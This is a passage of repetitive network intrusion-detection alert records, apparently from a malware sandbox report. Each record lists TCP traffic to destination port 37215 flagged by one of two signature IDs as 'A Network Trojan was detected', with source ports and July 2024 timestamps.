                  Source Port:54544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.083078
                  SID:2835222
                  Source Port:54774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.716127
                  SID:2835222
                  Source Port:56374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.428657
                  SID:2835222
                  Source Port:43542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.206981
                  SID:2835222
                  Source Port:43548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.344618
                  SID:2829579
                  Source Port:45286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.333013
                  SID:2835222
                  Source Port:37384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.483673
                  SID:2829579
                  Source Port:57334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.075999
                  SID:2829579
                  Source Port:41440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.591904
                  SID:2829579
                  Source Port:46498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.381629
                  SID:2835222
                  Source Port:57088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.414993
                  SID:2829579
                  Source Port:35750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.842656
                  SID:2829579
                  Source Port:49168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.302644
                  SID:2835222
                  Source Port:58930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.766383
                  SID:2829579
                  Source Port:41140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.883721
                  SID:2835222
                  Source Port:53274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081032
                  SID:2835222
                  Source Port:47708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.474239
                  SID:2829579
                  Source Port:43482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.210553
                  SID:2829579
                  Source Port:57458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.162880
                  SID:2829579
                  Source Port:57928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.904086
                  SID:2829579
                  Source Port:42146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.074036
                  SID:2835222
                  Source Port:36874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.156577
                  SID:2829579
                  Source Port:60172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.539034
                  SID:2835222
                  Source Port:51266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.835457
                  SID:2835222
                  Source Port:54432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.371486
                  SID:2829579
                  Source Port:36952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.144714
                  SID:2835222
                  Source Port:54936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.662238
                  SID:2829579
                  Source Port:56472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.211343
                  SID:2835222
                  Source Port:37612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.654674
                  SID:2829579
                  Source Port:37612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.822154
                  SID:2835222
                  Source Port:56432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.771791
                  SID:2829579
                  Source Port:44630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.446265
                  SID:2829579
                  Source Port:55186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.949585
                  SID:2829579
                  Source Port:36894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.679549
                  SID:2829579
                  Source Port:43184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.562174
                  SID:2835222
                  Source Port:35752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623389
                  SID:2829579
                  Source Port:54964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.021127
                  SID:2829579
                  Source Port:55000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.308313
                  SID:2829579
                  Source Port:52396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.240968
                  SID:2835222
                  Source Port:38612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.072676
                  SID:2835222
                  Source Port:33298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.834186
                  SID:2835222
                  Source Port:56264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.947291
                  SID:2829579
                  Source Port:43662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.741388
                  SID:2829579
                  Source Port:51650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.053274
                  SID:2829579
                  Source Port:57488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.492853
                  SID:2829579
                  Source Port:41312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.441344
                  SID:2835222
                  Source Port:39286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:58.519894
                  SID:2829579
                  Source Port:43512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.801277
                  SID:2829579
                  Source Port:60726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.293782
                  SID:2829579
                  Source Port:51522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.879292
                  SID:2835222
                  Source Port:44862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.579530
                  SID:2835222
                  Source Port:51170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.686618
                  SID:2835222
                  Source Port:45648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.529123
                  SID:2835222
                  Source Port:53498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.360429
                  SID:2835222
                  Source Port:46820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.559678
                  SID:2829579
                  Source Port:32980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.619678
                  SID:2835222
                  Source Port:39692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.860013
                  SID:2835222
                  Source Port:48520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.407027
                  SID:2835222
                  Source Port:34778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.278007
                  SID:2835222
                  Source Port:32920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.946656
                  SID:2829579
                  Source Port:36096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.821091
                  SID:2835222
                  Source Port:37916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.667686
                  SID:2829579
                  Source Port:50798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.412517
                  SID:2829579
                  Source Port:37120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.842206
                  SID:2835222
                  Source Port:55470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.532375
                  SID:2829579
                  Source Port:58910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.942132
                  SID:2829579
                  Source Port:36708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.656539
                  SID:2835222
                  Source Port:35408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.044301
                  SID:2829579
                  Source Port:41068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.476288
                  SID:2835222
                  Source Port:56178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.478921
                  SID:2829579
                  Source Port:33866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.996210
                  SID:2835222
                  Source Port:58624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.433898
                  SID:2829579
                  Source Port:41760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.615140
                  SID:2835222
                  Source Port:41058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.013030
                  SID:2829579
                  Source Port:49420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.519410
                  SID:2835222
                  Source Port:32928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.840921
                  SID:2829579
                  Source Port:52772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.811605
                  SID:2829579
                  Source Port:44936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.457969
                  SID:2835222
                  Source Port:59410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.651870
                  SID:2835222
                  Source Port:34590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.144714
                  SID:2835222
                  Source Port:54430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.844473
                  SID:2829579
                  Source Port:51518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.776043
                  SID:2829579
                  Source Port:35114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.220659
                  SID:2835222
                  Source Port:43338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.554660
                  SID:2829579
                  Source Port:37898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.603545
                  SID:2829579
                  Source Port:58416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.427094
                  SID:2829579
                  Source Port:46330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.096599
                  SID:2835222
                  Source Port:59954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.594845
                  SID:2829579
                  Source Port:40942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.928138
                  SID:2835222
                  Source Port:32774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.918557
                  SID:2835222
                  Source Port:53418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.822403
                  SID:2835222
                  Source Port:54148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.772266
                  SID:2829579
                  Source Port:41348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.158539
                  SID:2829579
                  Source Port:35698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.814052
                  SID:2835222
                  Source Port:36076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.870319
                  SID:2835222
                  Source Port:34388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.848690
                  SID:2835222
                  Source Port:48236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.949584
                  SID:2829579
                  Source Port:57544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.421781
                  SID:2829579
                  Source Port:48606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.356650
                  SID:2829579
                  Source Port:50994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.703676
                  SID:2835222
                  Source Port:53980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.484132
                  SID:2829579
                  Source Port:36306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.000164
                  SID:2829579
                  Source Port:40556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.610394
                  SID:2829579
                  Source Port:49334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.773956
                  SID:2835222
                  Source Port:59234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.018335
                  SID:2835222
                  Source Port:60454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.647337
                  SID:2829579
                  Source Port:50600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.455036
                  SID:2829579
                  Source Port:39722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.721021
                  SID:2829579
                  Source Port:48660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.537934
                  SID:2829579
                  Source Port:34072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.538879
                  SID:2835222
                  Source Port:38400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.852897
                  SID:2835222
                  Source Port:37648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.870791
                  SID:2835222
                  Source Port:50360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.845795
                  SID:2829579
                  Source Port:40044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.978087
                  SID:2835222
                  Source Port:50506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.978919
                  SID:2835222
                  Source Port:34790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.490419
                  SID:2835222
                  Source Port:35996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.530342
                  SID:2835222
                  Source Port:49820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.004841
                  SID:2835222
                  Source Port:57706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.969206
                  SID:2829579
                  Source Port:34920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.880494
                  SID:2829579
                  Source Port:37316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.723777
                  SID:2829579
                  Source Port:50252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.128414
                  SID:2829579
                  Source Port:45302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.976551
                  SID:2829579
                  Source Port:33280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.623992
                  SID:2829579
                  Source Port:44810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.087235
                  SID:2829579
                  Source Port:39654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.537934
                  SID:2829579
                  Source Port:32818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.594913
                  SID:2835222
                  Source Port:51926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.612334
                  SID:2829579
                  Source Port:52044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.779855
                  SID:2829579
                  Source Port:40704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.308630
                  SID:2829579
                  Source Port:47594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.204295
                  SID:2835222
                  Source Port:45312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.798286
                  SID:2835222
                  Source Port:43336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.281440
                  SID:2835222
                  Source Port:52704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.853545
                  SID:2835222
                  Source Port:36520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.759873
                  SID:2835222
                  Source Port:50640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.310052
                  SID:2835222
                  Source Port:58674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.005613
                  SID:2835222
                  Source Port:44450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.953433
                  SID:2835222
                  Source Port:52474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.614607
                  SID:2829579
                  Source Port:34024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.637493
                  SID:2835222
                  Source Port:36918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.507616
                  SID:2829579
                  Source Port:36980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.896326
                  SID:2829579
                  Source Port:58396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.911510
                  SID:2835222
                  Source Port:57398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.490604
                  SID:2835222
                  Source Port:42226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.957475
                  SID:2829579
                  Source Port:40938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.749012
                  SID:2835222
                  Source Port:45604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.837904
                  SID:2835222
                  Source Port:54480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.961786
                  SID:2835222
                  Source Port:33884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.522078
                  SID:2829579
                  Source Port:33682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.417770
                  SID:2835222
                  Source Port:57442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:30.989816
                  SID:2835222
                  Source Port:36402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.507926
                  SID:2829579
                  Source Port:50562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164336
                  SID:2829579
                  Source Port:50912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.611390
                  SID:2829579
                  Source Port:33176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.493465
                  SID:2829579
                  Source Port:40676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.899276
                  SID:2829579
                  Source Port:52224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.790374
                  SID:2829579
                  Source Port:42320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.462014
                  SID:2829579
                  Source Port:34348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.198321
                  SID:2829579
                  Source Port:39262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.356142
                  SID:2829579
                  Source Port:39964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.105620
                  SID:2835222
                  Source Port:60508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.728156
                  SID:2829579
                  Source Port:48944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.035646
                  SID:2835222
                  Source Port:33308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.946859
                  SID:2829579
                  Source Port:54034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.494991
                  SID:2835222
                  Source Port:48392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.825346
                  SID:2835222
                  Source Port:53718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.127756
                  SID:2829579
                  Source Port:37300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.127270
                  SID:2829579
                  Source Port:45802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927122
                  SID:2829579
                  Source Port:42682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.694603
                  SID:2835222
                  Source Port:54874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.767297
                  SID:2829579
                  Source Port:42038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.849428
                  SID:2829579
                  Source Port:54936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.614607
                  SID:2829579
                  Source Port:49090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623254
                  SID:2835222
                  Source Port:50200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.126065
                  SID:2835222
                  Source Port:56240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.828942
                  SID:2829579
                  Source Port:42530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.519262
                  SID:2829579
                  Source Port:57722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.845798
                  SID:2835222
                  Source Port:54718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369832
                  SID:2835222
                  Source Port:49630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.833960
                  SID:2829579
                  Source Port:49712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.816680
                  SID:2835222
                  Source Port:58994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819021
                  SID:2829579
                  Source Port:50878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.993548
